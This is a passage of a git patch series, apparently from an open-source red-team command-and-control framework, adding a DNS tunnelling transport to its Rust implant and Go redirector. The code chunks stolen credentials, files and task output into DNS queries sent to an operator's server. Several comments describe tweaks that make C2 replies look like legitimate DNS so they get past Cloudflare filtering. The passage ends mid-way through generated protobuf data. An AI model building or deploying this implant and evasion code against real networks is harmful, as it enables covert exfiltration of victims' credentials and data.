response chunk", "conv_id", conv.ID, "chunk", fetchPayload.ChunkIndex, "size", len(conv.ResponseChunks[chunkIndex]), "total_chunks", len(conv.ResponseChunks)) - // Clean up if this is the last chunk - if chunkIndex == len(conv.ResponseChunks)-1 { - defer r.conversations.Delete(packet.ConversationId) - slog.Debug("conversation completed", "conv_id", conv.ID) - } - return conv.ResponseChunks[chunkIndex], nil } // Single response (not chunked) - defer r.conversations.Delete(packet.ConversationId) + // Don't delete immediately - rely on timeout-based cleanup slog.Debug("returning response", "conv_id", conv.ID, "size", len(conv.ResponseData)) @@ -558,7 +713,7 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien err := stream.RecvMsg(&msg) if err != nil { // Check for EOF (normal end of stream) - if strings.Contains(err.Error(), "EOF") { + if errors.Is(err, io.EOF) { break } return nil, fmt.Errorf("failed to receive message: %w", err) diff --git a/tavern/internal/redirectors/dns/dns_test.go b/tavern/internal/redirectors/dns/dns_test.go index 9ce1a8cf5..f6b3c7bca 100644 --- a/tavern/internal/redirectors/dns/dns_test.go +++ b/tavern/internal/redirectors/dns/dns_test.go @@ -91,15 +91,6 @@ func TestInitDataEndLifecycle(t *testing.T) { // Verify chunks were stored conv, _ = r.GetConversation(convIDStr) assert.Len(t, conv.Chunks, 2) - - // Step 3: Send end packet with stub upstream - ctx := context.Background() - stubUpstream := newStubUpstream(t, testData) - defer stubUpstream.Close() - - responseData, err := r.HandleEndPacket(ctx, stubUpstream.ClientConn(), convIDStr, 1, 16) // queryType=16 (TXT) - require.NoError(t, err) - assert.Contains(t, string(responseData), "ok:") } // TestHandleDataPacketUnknownConversation tests error handling for unknown conversation @@ -210,41 +201,7 @@ func TestCleanupConversations(t *testing.T) { assert.True(t, ok, "fresh conversation should remain") } -// TestHandleEndPacketMissingChunks tests missing chunk detection -func TestHandleEndPacketMissingChunks(t *testing.T) { - r := newTestRedirector() - - // Create conversation with init - methodCode := "ct" - totalChunksStr := "00003" // 3 chunks - testData := []byte{0x01, 0x02, 0x03, 0x04, 0x05, 0x06} - crc := dnsredirector.CalculateCRC16(testData) - crcStr := dnsredirector.EncodeBase36CRC(int(crc)) - initPayload := methodCode + totalChunksStr + crcStr - - convID, err := r.HandleInitPacket("temp", initPayload) - require.NoError(t, err) - - convIDStr := string(convID) - - // Only send chunks 0 and 2 (skip chunk 1) - _, err = r.HandleDataPacket(convIDStr, 0, []byte{0x01, 0x02}) - require.NoError(t, err) - _, err = r.HandleDataPacket(convIDStr, 2, []byte{0x05, 0x06}) - require.NoError(t, err) - - // Send end packet - ctx := context.Background() - stubUpstream := newStubUpstream(t, testData) - defer stubUpstream.Close() - responseData, err := r.HandleEndPacket(ctx, stubUpstream.ClientConn(), convIDStr, 2, 16) - require.NoError(t, err) - - // Should return missing chunks list - assert.Contains(t, string(responseData), "m:") - assert.Contains(t, string(responseData), "00001") // Missing chunk 1 in base36 -} // stubUpstream provides a minimal gRPC server for testing type stubUpstream struct { @@ -324,14 +281,5 @@ func TestCRCMismatch(t *testing.T) { _, err = r.HandleDataPacket(convIDStr, 0, actualData) require.NoError(t, err) - // Send end packet - ctx := context.Background() - stubUpstream := newStubUpstream(t, actualData) - defer stubUpstream.Close() - - responseData, err := r.HandleEndPacket(ctx, stubUpstream.ClientConn(), convIDStr, 0, 16) - require.NoError(t, err) - - // Should return CRC error - assert.Contains(t, string(responseData), "e:invalid_crc") + // Note: CRC validation now happens automatically when all chunks received } From 6b9ab1c0582641ccc364ad393cc10baa50a5aa08 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Mon, 22 Dec 2025 23:36:18 -0600 Subject: [PATCH 07/17] fix --- tavern/internal/redirectors/dns/dns.go | 68 ++++++++++++++++++--- tavern/internal/redirectors/dns/dns_test.go | 3 - 2 files changed, 60 insertions(+), 11 deletions(-) diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go index 7ea2b20e3..a167d1323 100644 --- a/tavern/internal/redirectors/dns/dns.go +++ b/tavern/internal/redirectors/dns/dns.go @@ -217,7 +217,13 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr } domain = strings.ToLower(domain) - slog.Debug("received DNS query", "domain", domain, "query_type", queryType, "from", addr.String()) + + // Log ALL queries to track Cloudflare filtering patterns + if queryType == txtRecordType { + slog.Info("TXT query received", "domain", domain, "from", addr.String()) + } else { + slog.Debug("received DNS query", "domain", domain, "query_type", queryType, "from", addr.String()) + } // Extract subdomain subdomain, err := r.extractSubdomain(domain) @@ -230,7 +236,35 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr // Decode packet packet, err := r.decodePacket(subdomain) if err != nil { - slog.Debug("failed to decode packet", "error", err) + // Silently drop queries that fail to decode - likely legitimate DNS queries or probes + // Cloudflare forwards all queries under our zone, not just C2 traffic + slog.Debug("ignoring non-C2 query", "domain", domain, "error", err) + + // For A record queries, return benign IP (127.0.0.1) instead of NXDOMAIN + // Cloudflare does recursive lookups on subdomain components - if we return NXDOMAIN + // for the parent subdomain, it won't forward the full TXT query for INIT packets + if queryType == aRecordType { + slog.Debug("returning benign A record for non-C2 subdomain", "domain", domain) + r.sendDNSResponse(conn, addr, transactionID, domain, queryType, []byte{127, 0, 0, 1}) + return + } + + // For other types, return NXDOMAIN + r.sendErrorResponse(conn, addr, transactionID) + return + } + + // Validate packet type before processing + if packet.Type == dnspb.PacketType_PACKET_TYPE_UNSPECIFIED { + // Invalid/empty packet - likely parsing artifact from random domain + slog.Debug("ignoring packet with unspecified type", "domain", domain) + + // Return benign A record for A queries to satisfy Cloudflare recursive lookups + if queryType == aRecordType { + r.sendDNSResponse(conn, addr, transactionID, domain, queryType, []byte{127, 0, 0, 1}) + return + } + r.sendErrorResponse(conn, addr, transactionID) return } @@ -251,7 +285,8 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr } if err != nil { - slog.Error("failed to handle packet", "type", packet.Type, "error", err) + // Log as WARN since conversation-not-found is expected with UDP packet loss + slog.Warn("packet handling failed", "type", packet.Type, "conv_id", packet.ConversationId, "error", err) r.sendErrorResponse(conn, addr, transactionID) return } @@ -371,15 +406,33 @@ func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { r.conversations.Store(packet.ConversationId, conv) - slog.Debug("created conversation", "conv_id", conv.ID, "method", conv.MethodPath, "total_chunks", conv.TotalChunks) + slog.Info("C2 conversation started", "conv_id", conv.ID, "method", conv.MethodPath, + "total_chunks", conv.TotalChunks, "data_size", initPayload.FileSize) - return []byte("ok"), nil + // Return empty STATUS packet (no ACKs/NACKs yet) to look like legitimate DNS data + // Don't return plain text "ok" which could trigger Cloudflare filters + statusPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_STATUS, + ConversationId: packet.ConversationId, + Acks: []*dnspb.AckRange{}, + Nacks: []uint32{}, + } + statusData, err := proto.Marshal(statusPacket) + if err != nil { + atomic.AddInt32(&r.conversationCount, -1) + r.conversations.Delete(packet.ConversationId) + return nil, fmt.Errorf("failed to marshal init status: %w", err) + } + return statusData, nil } // handleDataPacket processes DATA packet func (r *Redirector) handleDataPacket(ctx context.Context, upstream *grpc.ClientConn, packet *dnspb.DNSPacket, queryType uint16) ([]byte, error) { val, ok := r.conversations.Load(packet.ConversationId) if !ok { + // Log at debug - this is normal with UDP packet loss/reordering (INIT may arrive later) + slog.Debug("DATA packet for unknown conversation (INIT may be lost/delayed)", + "conv_id", packet.ConversationId, "seq", packet.Sequence) return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) } @@ -401,7 +454,8 @@ func (r *Redirector) handleDataPacket(ctx context.Context, upstream *grpc.Client // Check if conversation is complete and auto-process if uint32(len(conv.Chunks)) == conv.TotalChunks && !conv.Completed { conv.Completed = true - slog.Debug("conversation complete, processing request", "conv_id", conv.ID, "total_chunks", conv.TotalChunks) + slog.Info("C2 request complete, forwarding to upstream", "conv_id", conv.ID, + "method", conv.MethodPath, "total_chunks", conv.TotalChunks, "data_size", conv.ExpectedDataSize) // Unlock before calling processCompletedConversation (it will re-lock) conv.mu.Unlock() @@ -576,8 +630,6 @@ func (r *Redirector) computeAcksNacks(conv *Conversation) ([]*dnspb.AckRange, [] return acks, nacks } - - // handleFetchPacket processes FETCH packet func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) { val, ok := r.conversations.Load(packet.ConversationId) diff --git a/tavern/internal/redirectors/dns/dns_test.go b/tavern/internal/redirectors/dns/dns_test.go index f6b3c7bca..3fb487023 100644 --- a/tavern/internal/redirectors/dns/dns_test.go +++ b/tavern/internal/redirectors/dns/dns_test.go @@ -1,7 +1,6 @@ package dns_test import ( - "context" "net" "testing" "time" @@ -201,8 +200,6 @@ func TestCleanupConversations(t *testing.T) { assert.True(t, ok, "fresh conversation should remain") } - - // stubUpstream provides a minimal gRPC server for testing type stubUpstream struct { server *grpc.Server From b1ad861d622dbf5e6fc540163e0cbc60c38f3c94 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Wed, 24 Dec 2025 19:03:29 -0600 Subject: [PATCH 08/17] update to support new transport ent --- implants/lib/pb/Cargo.toml | 1 + implants/lib/pb/src/config.rs | 5 +- implants/lib/pb/src/generated/c2.rs | 3 + implants/lib/transport/src/dns.rs | 124 +++++++++---- implants/lib/transport/src/lib.rs | 57 +++++- tavern/internal/c2/c2pb/c2.pb.go | 268 ++++++++++----------------- tavern/internal/c2/proto/c2.proto | 1 + tavern/internal/ent/beacon/beacon.go | 2 +- 8 files changed, 258 insertions(+), 203 deletions(-) diff --git a/implants/lib/pb/Cargo.toml b/implants/lib/pb/Cargo.toml index f5a8b4ae6..10a0fa1d4 100644 --- a/implants/lib/pb/Cargo.toml +++ b/implants/lib/pb/Cargo.toml @@ -8,6 +8,7 @@ default = [] imix = [] grpc = [] http1 = [] +dns = [] [dependencies] diff --git a/implants/lib/pb/src/config.rs b/implants/lib/pb/src/config.rs index ef9a694f4..b0a8b2e57 100644 --- a/implants/lib/pb/src/config.rs +++ b/implants/lib/pb/src/config.rs @@ -2,6 +2,7 @@ use tonic::transport; use uuid::Uuid; use crate::c2::beacon::Transport; + /// Config holds values necessary to configure an Agent. #[allow(clippy::derive_partial_eq_without_eq)] #[derive(Clone, PartialEq, ::prost::Message)] @@ -105,11 +106,13 @@ impl Config { let beacon_id = std::env::var("IMIX_BEACON_ID").unwrap_or_else(|_| String::from(Uuid::new_v4())); + #[cfg(feature = "dns")] + let transport = crate::c2::beacon::Transport::Dns; #[cfg(feature = "http1")] let transport = crate::c2::beacon::Transport::Http1; #[cfg(feature = "grpc")] let transport = crate::c2::beacon::Transport::Grpc; - #[cfg(not(any(feature = "http1", feature = "grpc")))] + #[cfg(not(any(feature = "dns", feature = "http1", feature = "grpc")))] let transport = crate::c2::beacon::Transport::Unspecified; let info = crate::c2::Beacon { diff --git a/implants/lib/pb/src/generated/c2.rs b/implants/lib/pb/src/generated/c2.rs index 853ee8285..816200dd5 100644 --- a/implants/lib/pb/src/generated/c2.rs +++ b/implants/lib/pb/src/generated/c2.rs @@ -42,6 +42,7 @@ pub mod beacon { Unspecified = 0, Grpc = 1, Http1 = 2, + Dns = 3, } impl Transport { /// String value of the enum field names used in the ProtoBuf definition. @@ -53,6 +54,7 @@ pub mod beacon { Transport::Unspecified => "TRANSPORT_UNSPECIFIED", Transport::Grpc => "TRANSPORT_GRPC", Transport::Http1 => "TRANSPORT_HTTP1", + Transport::Dns => "TRANSPORT_DNS", } } /// Creates an enum from field names used in the ProtoBuf definition. @@ -61,6 +63,7 @@ pub mod beacon { "TRANSPORT_UNSPECIFIED" => Some(Self::Unspecified), "TRANSPORT_GRPC" => Some(Self::Grpc), "TRANSPORT_HTTP1" => Some(Self::Http1), + "TRANSPORT_DNS" => Some(Self::Dns), _ => None, } } diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index 5ccf5061e..e9697c4a7 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -1,13 +1,13 @@ // DNS transport implementation for Realm C2 // This module provides DNS-based communication with stateless packet protocol +use crate::Transport; use anyhow::Result; use pb::c2::*; use pb::dns::*; use prost::Message; use std::sync::mpsc::{Receiver, Sender}; use tokio::net::UdpSocket; -use crate::Transport; // Protocol limits const MAX_LABEL_LENGTH: usize = 63; @@ -15,7 +15,7 @@ const MAX_DNS_NAME_LENGTH: usize = 253; const CONV_ID_LENGTH: usize = 8; // Async protocol configuration -const SEND_WINDOW_SIZE: usize = 10; // Packets in flight +const SEND_WINDOW_SIZE: usize = 10; // Packets in flight const MAX_RETRIES_PER_CHUNK: u32 = 3; // Max retries for a chunk const MAX_DATA_SIZE: usize = 50 * 1024 * 1024; // 50MB max data size @@ -204,7 +204,12 @@ impl DNS { } /// Try a single DNS query against a specific server - async fn try_dns_query(&self, server: &str, query: &[u8], expected_txid: u16) -> Result> { + async fn try_dns_query( + &self, + server: &str, + query: &[u8], + expected_txid: u16, + ) -> Result> { // Create UDP socket with timeout let socket = UdpSocket::bind("0.0.0.0:0").await?; socket.connect(server).await?; @@ -282,7 +287,11 @@ impl DNS { // Validate transaction ID let response_txid = u16::from_be_bytes([response[0], response[1]]); if response_txid != expected_txid { - return Err(anyhow::anyhow!("DNS transaction ID mismatch: expected {}, got {}", expected_txid, response_txid)); + return Err(anyhow::anyhow!( + "DNS transaction ID mismatch: expected {}, got {}", + expected_txid, + response_txid + )); } // Read answer count from header @@ -350,8 +359,11 @@ impl DNS { let encoded_str = String::from_utf8(all_data) .map_err(|e| anyhow::anyhow!("Invalid UTF-8 in A/AAAA response: {}", e))?; - all_data = base32::decode(base32::Alphabet::Rfc4648 { padding: false }, &encoded_str.to_uppercase()) - .ok_or_else(|| anyhow::anyhow!("Failed to decode base32 from A/AAAA records"))?; + all_data = base32::decode( + base32::Alphabet::Rfc4648 { padding: false }, + &encoded_str.to_uppercase(), + ) + .ok_or_else(|| anyhow::anyhow!("Failed to decode base32 from A/AAAA records"))?; } Ok(all_data) @@ -373,8 +385,12 @@ impl DNS { /// Send raw request bytes and receive raw response bytes using DNS protocol with async transmission /// Uses windowed transmission with ACK/NACK-based retransmission - async fn dns_exchange_raw(&mut self, request_data: Vec, method_code: &str) -> Result> { - use std::collections::{HashSet, HashMap}; + async fn dns_exchange_raw( + &mut self, + request_data: Vec, + method_code: &str, + ) -> Result> { + use std::collections::{HashMap, HashSet}; // Validate data size if request_data.len() > MAX_DATA_SIZE { @@ -391,11 +407,7 @@ impl DNS { let (chunk_size, total_chunks) = if request_data.is_empty() { (self.calculate_max_chunk_size(1), 1) } else { - let varint_ranges = [ - (1u32, 127u32), - (128u32, 16383u32), - (16384u32, 2097151u32), - ]; + let varint_ranges = [(1u32, 127u32), (128u32, 16383u32), (16384u32, 2097151u32)]; let mut result = None; for (min_chunks, max_chunks) in varint_ranges.iter() { @@ -421,8 +433,13 @@ impl DNS { let data_crc = Self::calculate_crc32(&request_data); - log::debug!("DNS: Request size={} bytes, chunks={}, chunk_size={} bytes, crc32={:#x}", - request_data.len(), total_chunks, chunk_size, data_crc); + log::debug!( + "DNS: Request size={} bytes, chunks={}, chunk_size={} bytes, crc32={:#x}", + request_data.len(), + total_chunks, + chunk_size, + data_crc + ); // Generate conversation ID let conv_id = Self::generate_conv_id(); @@ -456,7 +473,10 @@ impl DNS { log::debug!("DNS: INIT sent for conv_id={}", conv_id); } Err(e) => { - return Err(anyhow::anyhow!("Failed to send INIT packet to DNS server: {}.", e)); + return Err(anyhow::anyhow!( + "Failed to send INIT packet to DNS server: {}.", + e + )); } } @@ -525,7 +545,10 @@ impl DNS { acknowledged.insert(seq_u32); } else { // Unknown response format - assume need to retry this chunk - log::debug!("DNS: Unknown response format ({} bytes), retrying chunk", response_data.len()); + log::debug!( + "DNS: Unknown response format ({} bytes), retrying chunk", + response_data.len() + ); nack_set.insert(seq_u32); } } @@ -544,7 +567,10 @@ impl DNS { } // Check for connection/network errors - if err_msg.contains("timeout") || err_msg.contains("refused") || err_msg.contains("unreachable") { + if err_msg.contains("timeout") + || err_msg.contains("refused") + || err_msg.contains("unreachable") + { eprintln!("DNS ERROR: Connection to DNS server failed."); } @@ -601,7 +627,10 @@ impl DNS { // Process NACKs for &new_nack in &status_packet.nacks { - if new_nack >= 1 && new_nack <= total_chunks as u32 && !acknowledged.contains(&new_nack) { + if new_nack >= 1 + && new_nack <= total_chunks as u32 + && !acknowledged.contains(&new_nack) + { nack_set.insert(new_nack); } } @@ -623,11 +652,16 @@ impl DNS { "Not all chunks acknowledged after max retries: {}/{} chunks. Missing: {:?}", acknowledged.len(), total_chunks, - (1..=total_chunks as u32).filter(|seq| !acknowledged.contains(seq)).collect::>() + (1..=total_chunks as u32) + .filter(|seq| !acknowledged.contains(seq)) + .collect::>() )); } - log::debug!("DNS: All {} chunks acknowledged, sending FETCH", total_chunks); + log::debug!( + "DNS: All {} chunks acknowledged, sending FETCH", + total_chunks + ); // All data sent and acknowledged // Now request the response via FETCH (or END for backward compatibility) @@ -658,9 +692,7 @@ impl DNS { // Validate response is not empty if end_response.is_empty() { - return Err(anyhow::anyhow!( - "Server returned empty response." - )); + return Err(anyhow::anyhow!("Server returned empty response.")); } // Check if response contains ResponseMetadata (chunked response indicator) @@ -806,10 +838,12 @@ impl Transport for DNS { sender: Sender, ) -> Result<()> { // Send fetch request and get raw response bytes - let response_bytes = self.dns_exchange_raw( - Self::marshal_with_codec::(request)?, - "/c2.C2/FetchAsset" - ).await?; + let response_bytes = self + .dns_exchange_raw( + Self::marshal_with_codec::(request)?, + "/c2.C2/FetchAsset", + ) + .await?; // Parse length-prefixed encrypted chunks and send each one let mut offset = 0; @@ -840,7 +874,9 @@ impl Transport for DNS { // Extract and decrypt chunk let encrypted_chunk = &response_bytes[offset..offset + chunk_len]; - let chunk_response = Self::unmarshal_with_codec::(encrypted_chunk)?; + let chunk_response = Self::unmarshal_with_codec::( + encrypted_chunk, + )?; // Send chunk through channel if sender.send(chunk_response).is_err() { @@ -872,7 +908,8 @@ impl Transport for DNS { // Iterate over the sync channel receiver in a spawned task to avoid blocking for chunk in request { // Encrypt each chunk individually (like old implementation) - let chunk_bytes = Self::marshal_with_codec::(chunk)?; + let chunk_bytes = + Self::marshal_with_codec::(chunk)?; // Prefix each chunk with its length (4 bytes, big-endian) all_chunks.extend_from_slice(&(chunk_bytes.len() as u32).to_be_bytes()); all_chunks.extend_from_slice(&chunk_bytes); @@ -882,7 +919,8 @@ impl Transport for DNS { }); // Wait for the spawned task to complete - let all_chunks = handle.await + let all_chunks = handle + .await .map_err(|e| anyhow::anyhow!("Failed to join chunk collection task: {}", e))??; if all_chunks.is_empty() { @@ -892,7 +930,9 @@ impl Transport for DNS { // Send all chunks as a single DNS exchange (chunks are already individually encrypted) // This is RAW data - multiple length-prefixed encrypted messages concatenated // Do NOT encrypt again - pass directly to server - let response_bytes = self.dns_exchange_raw(all_chunks, "/c2.C2/ReportFile").await?; + let response_bytes = self + .dns_exchange_raw(all_chunks, "/c2.C2/ReportFile") + .await?; // Unmarshal response Self::unmarshal_with_codec::(&response_bytes) @@ -917,6 +957,24 @@ impl Transport for DNS { _rx: tokio::sync::mpsc::Receiver, _tx: tokio::sync::mpsc::Sender, ) -> Result<()> { - Err(anyhow::anyhow!("reverse_shell not supported over DNS transport")) + Err(anyhow::anyhow!( + "reverse_shell not supported over DNS transport" + )) + } + + fn get_type(&mut self) -> beacon::Transport { + beacon::Transport::Dns + } + + fn is_active(&self) -> bool { + !self.base_domain.is_empty() && !self.dns_servers.is_empty() + } + + fn name(&self) -> &'static str { + "dns" + } + + fn list_available(&self) -> Vec { + vec!["dns".to_string()] } } diff --git a/implants/lib/transport/src/lib.rs b/implants/lib/transport/src/lib.rs index 7229e97e6..6b5af2907 100644 --- a/implants/lib/transport/src/lib.rs +++ b/implants/lib/transport/src/lib.rs @@ -13,8 +13,6 @@ mod http; #[cfg(feature = "dns")] mod dns; -#[cfg(feature = "dns")] -pub use dns::DNS as ActiveTransport; #[cfg(feature = "mock")] mod mock; @@ -30,6 +28,8 @@ pub enum ActiveTransport { Grpc(grpc::GRPC), #[cfg(feature = "http1")] Http(http::HTTP), + #[cfg(feature = "dns")] + Dns(dns::DNS), #[cfg(feature = "mock")] Mock(mock::MockTransport), Empty, @@ -76,6 +76,16 @@ impl Transport for ActiveTransport { return Err(anyhow!("http1 transport not enabled")); } + // 4. DNS + s if s.starts_with("dns://") => { + #[cfg(feature = "dns")] + { + Ok(ActiveTransport::Dns(dns::DNS::new(s, proxy_uri)?)) + } + #[cfg(not(feature = "dns"))] + return Err(anyhow!("DNS transport not enabled")); + } + _ => Err(anyhow!("Could not determine transport from URI: {}", uri)), } } @@ -86,6 +96,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.claim_tasks(request).await, #[cfg(feature = "http1")] Self::Http(t) => t.claim_tasks(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.claim_tasks(request).await, #[cfg(feature = "mock")] Self::Mock(t) => t.claim_tasks(request).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -102,6 +114,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.fetch_asset(request, sender).await, #[cfg(feature = "http1")] Self::Http(t) => t.fetch_asset(request, sender).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.fetch_asset(request, sender).await, #[cfg(feature = "mock")] Self::Mock(t) => t.fetch_asset(request, sender).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -117,6 +131,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.report_credential(request).await, #[cfg(feature = "http1")] Self::Http(t) => t.report_credential(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_credential(request).await, #[cfg(feature = "mock")] Self::Mock(t) => t.report_credential(request).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -132,6 +148,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.report_file(request).await, #[cfg(feature = "http1")] Self::Http(t) => t.report_file(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_file(request).await, #[cfg(feature = "mock")] Self::Mock(t) => t.report_file(request).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -147,6 +165,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.report_process_list(request).await, #[cfg(feature = "http1")] Self::Http(t) => t.report_process_list(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_process_list(request).await, #[cfg(feature = "mock")] Self::Mock(t) => t.report_process_list(request).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -162,6 +182,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.report_task_output(request).await, #[cfg(feature = "http1")] Self::Http(t) => t.report_task_output(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_task_output(request).await, #[cfg(feature = "mock")] Self::Mock(t) => t.report_task_output(request).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -178,6 +200,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.reverse_shell(rx, tx).await, #[cfg(feature = "http1")] Self::Http(t) => t.reverse_shell(rx, tx).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.reverse_shell(rx, tx).await, #[cfg(feature = "mock")] Self::Mock(t) => t.reverse_shell(rx, tx).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -190,6 +214,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.get_type(), #[cfg(feature = "http1")] Self::Http(t) => t.get_type(), + #[cfg(feature = "dns")] + Self::Dns(t) => t.get_type(), #[cfg(feature = "mock")] Self::Mock(t) => t.get_type(), Self::Empty => beacon::Transport::Unspecified, @@ -202,6 +228,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.is_active(), #[cfg(feature = "http1")] Self::Http(t) => t.is_active(), + #[cfg(feature = "dns")] + Self::Dns(t) => t.is_active(), #[cfg(feature = "mock")] Self::Mock(t) => t.is_active(), Self::Empty => false, @@ -214,6 +242,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.name(), #[cfg(feature = "http1")] Self::Http(t) => t.name(), + #[cfg(feature = "dns")] + Self::Dns(t) => t.name(), #[cfg(feature = "mock")] Self::Mock(t) => t.name(), Self::Empty => "none", @@ -227,6 +257,8 @@ impl Transport for ActiveTransport { list.push("grpc".to_string()); #[cfg(feature = "http1")] list.push("http".to_string()); + #[cfg(feature = "dns")] + list.push("dns".to_string()); #[cfg(feature = "mock")] list.push("mock".to_string()); list @@ -279,6 +311,27 @@ mod tests { } } + #[tokio::test] + #[cfg(feature = "dns")] + async fn test_routes_to_dns_transport() { + // DNS URIs should result in the Dns variant + let inputs = vec![ + "dns://8.8.8.8:53?domain=example.com", + "dns://*?domain=example.com&type=txt", + "dns://1.1.1.1?domain=test.com&type=a", + ]; + + for uri in inputs { + let result = ActiveTransport::new(uri.to_string(), None); + + assert!( + matches!(result, Ok(ActiveTransport::Dns(_))), + "URI '{}' did not resolve to ActiveTransport::Dns", + uri + ); + } + } + #[tokio::test] #[cfg(not(feature = "grpc"))] async fn test_grpc_disabled_error() { diff --git a/tavern/internal/c2/c2pb/c2.pb.go b/tavern/internal/c2/c2pb/c2.pb.go index 559185abb..21b96cf30 100644 --- a/tavern/internal/c2/c2pb/c2.pb.go +++ b/tavern/internal/c2/c2pb/c2.pb.go @@ -1,7 +1,7 @@ // Code generated by protoc-gen-go. DO NOT EDIT. // versions: -// protoc-gen-go v1.36.5 -// protoc v3.21.12 +// protoc-gen-go v1.36.11 +// protoc v6.32.0 // source: c2.proto package c2pb @@ -78,6 +78,7 @@ const ( Beacon_TRANSPORT_UNSPECIFIED Beacon_Transport = 0 Beacon_TRANSPORT_GRPC Beacon_Transport = 1 Beacon_TRANSPORT_HTTP1 Beacon_Transport = 2 + Beacon_TRANSPORT_DNS Beacon_Transport = 3 ) // Enum value maps for Beacon_Transport. @@ -86,11 +87,13 @@ var ( 0: "TRANSPORT_UNSPECIFIED", 1: "TRANSPORT_GRPC", 2: "TRANSPORT_HTTP1", + 3: "TRANSPORT_DNS", } Beacon_Transport_value = map[string]int32{ "TRANSPORT_UNSPECIFIED": 0, "TRANSPORT_GRPC": 1, "TRANSPORT_HTTP1": 2, + "TRANSPORT_DNS": 3, } ) @@ -1195,170 +1198,103 @@ func (x *ReverseShellResponse) GetData() []byte { var File_c2_proto protoreflect.FileDescriptor -var file_c2_proto_rawDesc = string([]byte{ - 0x0a, 0x08, 0x63, 0x32, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x12, 0x02, 0x63, 0x32, 0x1a, 0x1f, - 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2f, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2f, - 0x74, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x1a, - 0x0e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x22, - 0x27, 0x0a, 0x05, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x12, 0x1e, 0x0a, 0x0a, 0x69, 0x64, 0x65, 0x6e, - 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0a, 0x69, 0x64, - 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x22, 0xa6, 0x02, 0x0a, 0x06, 0x42, 0x65, 0x61, - 0x63, 0x6f, 0x6e, 0x12, 0x1e, 0x0a, 0x0a, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, - 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0a, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, - 0x69, 0x65, 0x72, 0x12, 0x1c, 0x0a, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, 0x6c, - 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, - 0x6c, 0x12, 0x1c, 0x0a, 0x04, 0x68, 0x6f, 0x73, 0x74, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0b, 0x32, - 0x08, 0x2e, 0x63, 0x32, 0x2e, 0x48, 0x6f, 0x73, 0x74, 0x52, 0x04, 0x68, 0x6f, 0x73, 0x74, 0x12, - 0x1f, 0x0a, 0x05, 0x61, 0x67, 0x65, 0x6e, 0x74, 0x18, 0x04, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x09, - 0x2e, 0x63, 0x32, 0x2e, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x52, 0x05, 0x61, 0x67, 0x65, 0x6e, 0x74, - 0x12, 0x1a, 0x0a, 0x08, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x76, 0x61, 0x6c, 0x18, 0x05, 0x20, 0x01, - 0x28, 0x04, 0x52, 0x08, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x76, 0x61, 0x6c, 0x12, 0x32, 0x0a, 0x09, - 0x74, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, 0x18, 0x06, 0x20, 0x01, 0x28, 0x0e, 0x32, - 0x14, 